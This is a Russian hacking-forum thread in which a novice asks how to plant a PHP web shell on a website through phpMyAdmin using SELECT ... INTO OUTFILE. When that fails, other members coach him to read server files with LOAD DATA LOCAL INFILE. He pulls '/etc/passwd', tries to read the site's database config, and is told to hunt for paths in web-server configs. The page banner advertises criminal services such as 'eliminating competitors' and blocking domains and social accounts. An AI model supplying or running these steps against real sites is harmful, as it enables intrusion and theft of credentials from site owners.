FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
Форум АНТИЧАТ
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Песочница
Как залить шелл через PMA?
Поиск по форуму
Расширенный поиск
Страница 1 из 2
1
2
>
Опции темы
Поиск в этой теме
Опции просмотра
#
1
24.12.2015, 20:49
Edward007
Новичок
Регистрация: 24.12.2015
Сообщений: 20
Провел на форуме:
6208
Репутация:
0
Вообщем дело такое, я уже и гуглил, и у знакомых спрашивал, никто ничего не знает.
Возможно ли как-то разрешить File_priv через саму бд?
Выполняю запрос: SELECT shell FROM `shell` INTO OUTFILE '/blablabla/data/www/site.ru.su/22.php';
И скули выбивает ошибку: #1045 - Access denied for user 'shopsof'@'%' (using password: YES)
Можно ли что-то сделать в этой ситуации?
Edward007
Посмотреть профиль
Репутация
Найти все сообщения от Edward007
Добавить в друзья
#
2
25.12.2015, 00:43
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
думаю, нет. максимум, что возможно - чтение файлов:
https://rdot.org/forum/showthread.php?t=741
faza02
Посмотреть профиль
Репутация
Посетить домашнюю страницу faza02
Найти все сообщения от faza02
Добавить в друзья
#
3
25.12.2015, 00:54
Edward007
Новичок
Регистрация: 24.12.2015
Сообщений: 20
Провел на форуме:
6208
Репутация:
0
Очень жаль :С
Edward007
Посмотреть профиль
Репутация
Найти все сообщения от Edward007
Добавить в друзья
#
4
25.12.2015, 00:57
Edward007
Новичок
Регистрация: 24.12.2015
Сообщений: 20
Провел на форуме:
6208
Репутация:
0
Цитата:
Сообщение от
yarbabin
↑
думаю, нет. максимум, что возможно - чтение файлов:
https://rdot.org/forum/showthread.php?t=741
Я новичок в этой сфере, не понимаю что делать дальше.
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'
Выдало:
Добавлено 2 строки.
Идентификатор вставленной строки: 945 ( Запрос занял 0.0004 сек. )
Что дальше?
Edward007
Посмотреть профиль
Репутация
Найти все сообщения от Edward007
Добавить в друзья
#
5
25.12.2015, 11:39
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
таблицу test посмотрите
faza02
Посмотреть профиль
Репутация
Посетить домашнюю страницу faza02
Найти все сообщения от faza02
Добавить в друзья
#
6
25.12.2015, 12:06
Edward007
Новичок
Регистрация: 24.12.2015
Сообщений: 20
Провел на форуме:
6208
Репутация:
0
Цитата:
Сообщение от
yarbabin
↑
таблицу test посмотрите
Вбил так:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'
Зашел в табл, там такое:
http://i.imgur.com/YBBXi0U.png
Пытаюсь dbconfig.php открыть:
LOAD DATA LOCAL INFILE '/www/xxx.su/engine/data/dbconfig.php' INTO TABLE test FIELDS TERMINATED BY '\n'
Скули выбивает:
#2 - File '/www/xxx.su/engine/data/dbconfig.php' not found (Errcode: 2 "No such file or directory")
Что делать?
Edward007
Посмотреть профиль
Репутация
Найти все сообщения от Edward007
Добавить в друзья
#
7
25.12.2015, 19:16
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все
faza02
Посмотреть профиль
Репутация
Посетить домашнюю страницу faza02
Найти все сообщения от faza02
Добавить в друзья
#
8
25.12.2015, 20:13
5maks5
Постоянный
Регистрация: 29.08.2010
Сообщений: 448
Провел на форуме:
168184
Репутация:
40
Шел 2015 год, PHP 7 лежал в репозитории на GitHub, а люди все еще использовали MySQL 5.5 с FILE_PRIV=Y.
К чему это я?
Где вы откапываете этих мастодонтов?
5maks5
Посмотреть профиль
Репутация
Найти все сообщения от 5maks5
Добавить в друзья
#
9
25.12.2015, 20:50
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
да кому это интересно - апдейты делать?
faza02
Посмотреть профиль
Репутация
Посетить домашнюю страницу faza02
Найти все сообщения от faza02
Добавить в друзья
#
10
25.12.2015, 21:21
Edward007
Новичок
Регистрация: 24.12.2015
Сообщений: 20
Провел на форуме:
6208
Репутация:
0
Цитата:
Сообщение от
yarbabin
↑
в ошибке вам говорят, что путь неверный. ищите пути. раскрытие, чтение конфигов веб-серера, вот это все
Можно пример, как можно найти пути?
В этой сфере я слаб...
Edward007
Посмотреть профиль
Репутация
Найти все сообщения от Edward007
Добавить в друзья
Страница 1 из 2
1
2
>
«
Предыдущая тема
|
Следующая тема
»
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Olbanec - Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.